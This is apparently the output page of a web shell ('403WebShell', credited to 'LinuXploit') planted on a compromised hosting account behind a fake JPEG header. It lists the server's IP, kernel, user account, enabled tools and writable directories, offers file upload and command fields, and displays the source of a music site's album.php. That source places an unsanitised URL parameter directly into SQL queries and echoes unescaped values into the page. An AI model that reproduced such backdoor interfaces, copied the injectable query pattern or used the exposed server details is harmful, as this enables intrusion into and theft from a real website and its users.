����JFIF��H�H����Exif��MM�*���� ��3����V�����3������3�(��������������������3�����403WebShell
403Webshell
Server IP : 162.0.232.25  /  Your IP : 3.139.233.121
Web Server : LiteSpeed
System : Linux premium276.web-hosting.com 4.18.0-513.11.1.lve.el8.x86_64 #1 SMP Thu Jan 18 16:21:02 UTC 2024 x86_64
User : kwacuqig ( 988)
PHP Version : 8.2.26
Disable Function : NONE
MySQL : OFF  |  cURL : ON  |  WGET : ON  |  Perl : ON  |  Python : ON  |  Sudo : OFF  |  Pkexec : OFF
Directory :  /home/kwacuqig/redlighttunes.com/

Upload File :
current_dir [ Writeable ] document_root [ Writeable ]

 

Command :


[ Back ]     

Current File : /home/kwacuqig/redlighttunes.com/album.php
<?php
include './php/connect.php';

if (isset($_GET['id'])) {
	$aid = $_GET['id'];
	$sql = "SELECT `artist`,`title`,`image`,`type`,`zip_downloads` FROM `albums` WHERE `id`=$aid";
	$run = mysqli_query($conn, $sql) or die(mysqli_error($conn));
	list($artist, $title, $image, $type, $zip_downloads) = mysqli_fetch_array($run);
}
?>
<!DOCTYPE html>
<html lang="en">

<head>
    <meta charset="utf-8">
    <meta name="viewport" content="width=device-width, initial-scale=1, shrink-to-fit=no">

    <!-- CSS -->
    <link rel="stylesheet" href="css/bootstrap-reboot.min.css">
    <link rel="stylesheet" href="css/bootstrap-grid.min.css">
    <link rel="stylesheet" href="css/owl.carousel.min.css">
    <link rel="stylesheet" href="css/magnific-popup.css">
    <link rel="stylesheet" href="css/select2.min.css">
    <link rel="stylesheet" href="css/paymentfont.min.css">
    <link rel="stylesheet" href="css/slider-radio.css">
    <link rel="stylesheet" href="css/plyr.css">
    <link rel="stylesheet" href="css/main.css">
    <link rel="stylesheet" href="css/animate.css">

    <!-- Favicons -->
    <link rel="icon" type="image/png" href="icon/redlighttunes.png" sizes="32x32">

	<!--open graph codes-->
	<meta property="og:url"           content="https://redlighttunes.com/album.php?id=<?php echo $aid;?>" />
	<meta property="og:type"          content="website" />
	<meta property="og:title"         content="<?php echo "$artist - $title";?>" />
	<meta property="og:image"         content="https://redlighttunes.com/albums/covers/<?php echo $image;?>" />
	<meta property="og:description"   content="<?php echo strtoupper($type);?>" />
	<meta property="fb:app_id"   		content="197362031139140" />  

    <meta name="description" content="Redlighttunes">
    <meta name="author" content="Beaton Ndawa">
    <title><?php echo strtoupper($type).": $title - $artist"; ?></title>

</head>

<body>
    <!-- header -->
    <header class="header">
        <div class="header__content">
            <div class="header__logo">
                <a href="home">
                    <img src="./icon/redlighttunes.png" alt="">
                </a>
            </div>

            <nav class="header__nav">
                <a href="about">About</a>
                <a href="contacts">Contacts</a>
            </nav>

            <form action="search" method="POST" class="header__search">
                <input type="text" name="search" placeholder="Search">
                <button type="submit"><svg xmlns="http://www.w3.org/2000/svg" viewBox="0 0 24 24">
                        <path d="M21.71,20.29,18,16.61A9,9,0,1,0,16.61,18l3.68,3.68a1,1,0,0,0,1.42,0A1,1,0,0,0,21.71,20.29ZM11,18a7,7,0,1,1,7-7A7,7,0,0,1,11,18Z" />
                    </svg></button>
            </form>

            <div class="header__actions">
                <div class="header__action header__action--search">
                    <button class="header__action-btn" type="button"><svg xmlns="http://www.w3.org/2000/svg" viewBox="0 0 24 24">
                            <path d="M21.71,20.29,18,16.61A9,9,0,1,0,16.61,18l3.68,3.68a1,1,0,0,0,1.42,0A1,1,0,0,0,21.71,20.29ZM11,18a7,7,0,1,1,7-7A7,7,0,0,1,11,18Z" />
                        </svg></button>
                </div>
            </div>

            <button class="header__btn" type="button">
                <span></span>
                <span></span>
                <span></span>
            </button>
        </div>
    </header>
    <!-- end header -->
<?php
include './sidebar.php';
?>

<!-- main content -->
<main class="main">
	<div class="container-fluid">
		<div class="row row--grid">
			<!-- breadcrumb -->
			<div class="col-12">
				<ul class="breadcrumb">
					<li class="breadcrumb__item"><a href="home">Home</a></li>
					<li class="breadcrumb__item"><a href="c=albums">Albums</a></li>
					<li class="breadcrumb__item breadcrumb__item--active"><?php echo $title; ?></li>
				</ul>
			</div>
			<!-- end breadcrumb -->

			<!-- title -->
			<div class="col-12">
				<div class="main__title main__title--page">
					<h1><?php echo "$artist – $title"; ?></h1>
				</div>
			</div>
			<!-- end title -->

			<div class="col-12">
				<div class="release">
					<div class="release__content">
						<div class="release__cover">
							<img src="./albums/covers/<?php echo $image; ?>" alt="">
						</div>
						<?php
						$sql = "SELECT * FROM `albums`,`album_content` WHERE `albums`.`id`=`album_content`.`aid` AND `albums`.`id`=$aid ORDER BY `album_content`.`sid` ASC";
						$run2 = mysqli_query($conn, $sql) or die(mysqli_error($conn));
						$amount = mysqli_num_rows($run2);
						?>
						<div class="release__stat">
							<span><svg xmlns="http://www.w3.org/2000/svg" viewBox="0 0 24 24">
									<path d="M21.65,2.24a1,1,0,0,0-.8-.23l-13,2A1,1,0,0,0,7,5V15.35A3.45,3.45,0,0,0,5.5,15,3.5,3.5,0,1,0,9,18.5V10.86L20,9.17v4.18A3.45,3.45,0,0,0,18.5,13,3.5,3.5,0,1,0,22,16.5V3A1,1,0,0,0,21.65,2.24ZM5.5,20A1.5,1.5,0,1,1,7,18.5,1.5,1.5,0,0,1,5.5,20Zm13-2A1.5,1.5,0,1,1,20,16.5,1.5,1.5,0,0,1,18.5,18ZM20,7.14,9,8.83v-3L20,4.17Z" />
								</svg> <?php echo $amount; ?> tracks</span>
							<span><svg xmlns="http://www.w3.org/2000/svg" viewBox="0 0 512 512">
									<path d="M216 0h80c13.3 0 24 10.7 24 24v168h87.7c17.8 0 26.7 21.5 14.1 34.1L269.7 378.3c-7.5 7.5-19.8 7.5-27.3 0L90.1 226.1c-12.6-12.6-3.7-34.1 14.1-34.1H192V24c0-13.3 10.7-24 24-24zm296 376v112c0 13.3-10.7 24-24 24H24c-13.3 0-24-10.7-24-24V376c0-13.3 10.7-24 24-24h146.7l49 49c20.1 20.1 52.5 20.1 72.6 0l49-49H488c13.3 0 24 10.7 24 24zm-124 88c0-11-9-20-20-20s-20 9-20 20 9 20 20 20 20-9 20-20zm64 0c0-11-9-20-20-20s-20 9-20 20 9 20 20 20 20-9 20-20z" />
								</svg> <?php echo $zip_downloads; ?></span>
						</div>
						<a href="download.php?zid=<?php echo $aid;?>" class="release__buy">Download Zip</a>
					</div>

					<div class="release__list">
						<ul class="main__list main__list--playlist main__list--dashbox">
							<?php
							$count = 1;
							while ($row = mysqli_fetch_array($run2)) {
							?>
								<li class="single-item">
									<a data-playlist data-title="<?php echo "$count. " . $row['music_title']; ?>" data-artist="<?php echo $row['artist']; ?>" data-img="stream.php?aid=<?php echo $row['sid'].'&image='.$image; ?>" href="./albums/audios/<?php echo $row['music']; ?>" class="single-item__cover">
										<img src="./albums/covers/<?php echo $row['image']; ?>" alt="">
										<svg xmlns="http://www.w3.org/2000/svg" viewBox="0 0 24 24">
											<path d="M18.54,9,8.88,3.46a3.42,3.42,0,0,0-5.13,3V17.58A3.42,3.42,0,0,0,7.17,21a3.43,3.43,0,0,0,1.71-.46L18.54,15a3.42,3.42,0,0,0,0-5.92Zm-1,4.19L7.88,18.81a1.44,1.44,0,0,1-1.42,0,1.42,1.42,0,0,1-.71-1.23V6.42a1.42,1.42,0,0,1,.71-1.23A1.51,1.51,0,0,1,7.17,5a1.54,1.54,0,0,1,.71.19l9.66,5.58a1.42,1.42,0,0,1,0,2.46Z" />
										</svg>
										<svg xmlns="http://www.w3.org/2000/svg" viewBox="0 0 24 24">
											<path d="M16,2a3,3,0,0,0-3,3V19a3,3,0,0,0,6,0V5A3,3,0,0,0,16,2Zm1,17a1,1,0,0,1-2,0V5a1,1,0,0,1,2,0ZM8,2A3,3,0,0,0,5,5V19a3,3,0,0,0,6,0V5A3,3,0,0,0,8,2ZM9,19a1,1,0,0,1-2,0V5A1,1,0,0,1,9,5Z" />
										</svg>
									</a>
									<div class="single-item__title">
										<h4><a href="#"><?php echo "$count. " . $row['music_title']; ?></a></h4>
										<span><a href="artist.html"><?php echo $row['artist']; ?></a></span>
									</div>
									<a href="#modal-info-<?php echo $row['sid']; ?>" class="single-item__add open-modal">

										<svg xmlns="http://www.w3.org/2000/svg" viewBox="0 0 192 512">
											<path d="M20 424.229h20V279.771H20c-11.046 0-20-8.954-20-20V212c0-11.046 8.954-20 20-20h112c11.046 0 20 8.954 20 20v212.229h20c11.046 0 20 8.954 20 20V492c0 11.046-8.954 20-20 20H20c-11.046 0-20-8.954-20-20v-47.771c0-11.046 8.954-20 20-20zM96 0C56.235 0 24 32.235 24 72s32.235 72 72 72 72-32.235 72-72S135.764 0 96 0z" />
										</svg>
									</a>
									<a href="download.php?aid=<?php echo $row['sid']; ?>" class="single-item__export">
										<svg xmlns="http://www.w3.org/2000/svg" viewBox="0 0 24 24">
											<path d="M21,14a1,1,0,0,0-1,1v4a1,1,0,0,1-1,1H5a1,1,0,0,1-1-1V15a1,1,0,0,0-2,0v4a3,3,0,0,0,3,3H19a3,3,0,0,0,3-3V15A1,1,0,0,0,21,14Zm-9.71,1.71a1,1,0,0,0,.33.21.94.94,0,0,0,.76,0,1,1,0,0,0,.33-.21l4-4a1,1,0,0,0-1.42-1.42L13,12.59V3a1,1,0,0,0-2,0v9.59l-2.29-2.3a1,1,0,1,0-1.42,1.42Z"></path>
										</svg>
									</a>
								</li>

								<!-- modal info -->
								<div id="modal-info-<?php echo $row['sid']; ?>" class="zoom-anim-dialog mfp-hide modal modal--info">
									<span class="modal__icon">
										<svg xmlns="http://www.w3.org/2000/svg" viewBox="0 0 24 24">
											<path d="M12,2A10,10,0,1,0,22,12,10.01114,10.01114,0,0,0,12,2Zm0,18a8,8,0,1,1,8-8A8.00917,8.00917,0,0,1,12,20Zm0-8.5a1,1,0,0,0-1,1v3a1,1,0,0,0,2,0v-3A1,1,0,0,0,12,11.5Zm0-4a1.25,1.25,0,1,0,1.25,1.25A1.25,1.25,0,0,0,12,7.5Z"></path>
										</svg>
									</span>

									<button class="modal__close" type="button"><svg xmlns="http://www.w3.org/2000/svg" viewBox="0 0 24 24">
											<path d="M13.41,12l4.3-4.29a1,1,0,1,0-1.42-1.42L12,10.59,7.71,6.29A1,1,0,0,0,6.29,7.71L10.59,12l-4.3,4.29a1,1,0,0,0,0,1.42,1,1,0,0,0,1.42,0L12,13.41l4.29,4.3a1,1,0,0,0,1.42,0,1,1,0,0,0,0-1.42Z" />
										</svg></button>

									<h4 class="sign__title"><?php echo $row['music_title']; ?></h4>

									<div class="sign__group sign__group--row">
										<label class="sign__label"><i class="fa fa-file-audio"></i></label>
										<span class="sign__value"><?php echo $row['size']; ?>mb</span>
									</div>
									<div class="sign__group sign__group--row">
										<label class="sign__label"><i class="fa fa-cloud-download-alt"></i></label>
										<span class="sign__value"><?php echo $row['downloads']; ?></span>
									</div>
									<div class="sign__group sign__group--row">
										<label class="sign__label"><i class="fa fa-headphones"></i></label>
										<span class="sign__value"><?php echo $row['streams']; ?></span>
									</div>
								</div>
							<?php
								++$count;
							}
							?>
						</ul>
					</div>
				</div>
			</div>

		</div>
	</div>
</main>
<!-- end main content -->

<?php
include './footer.php';
?>
<script>
	document.querySelectorAll("ul.sidebar__nav .sidebar__nav-item a")[2].classList.add("sidebar__nav-link--active");
</script>
<?php
include './scripts.php';
?>

Youez - 2016 - github.com/yon3zu
LinuXploit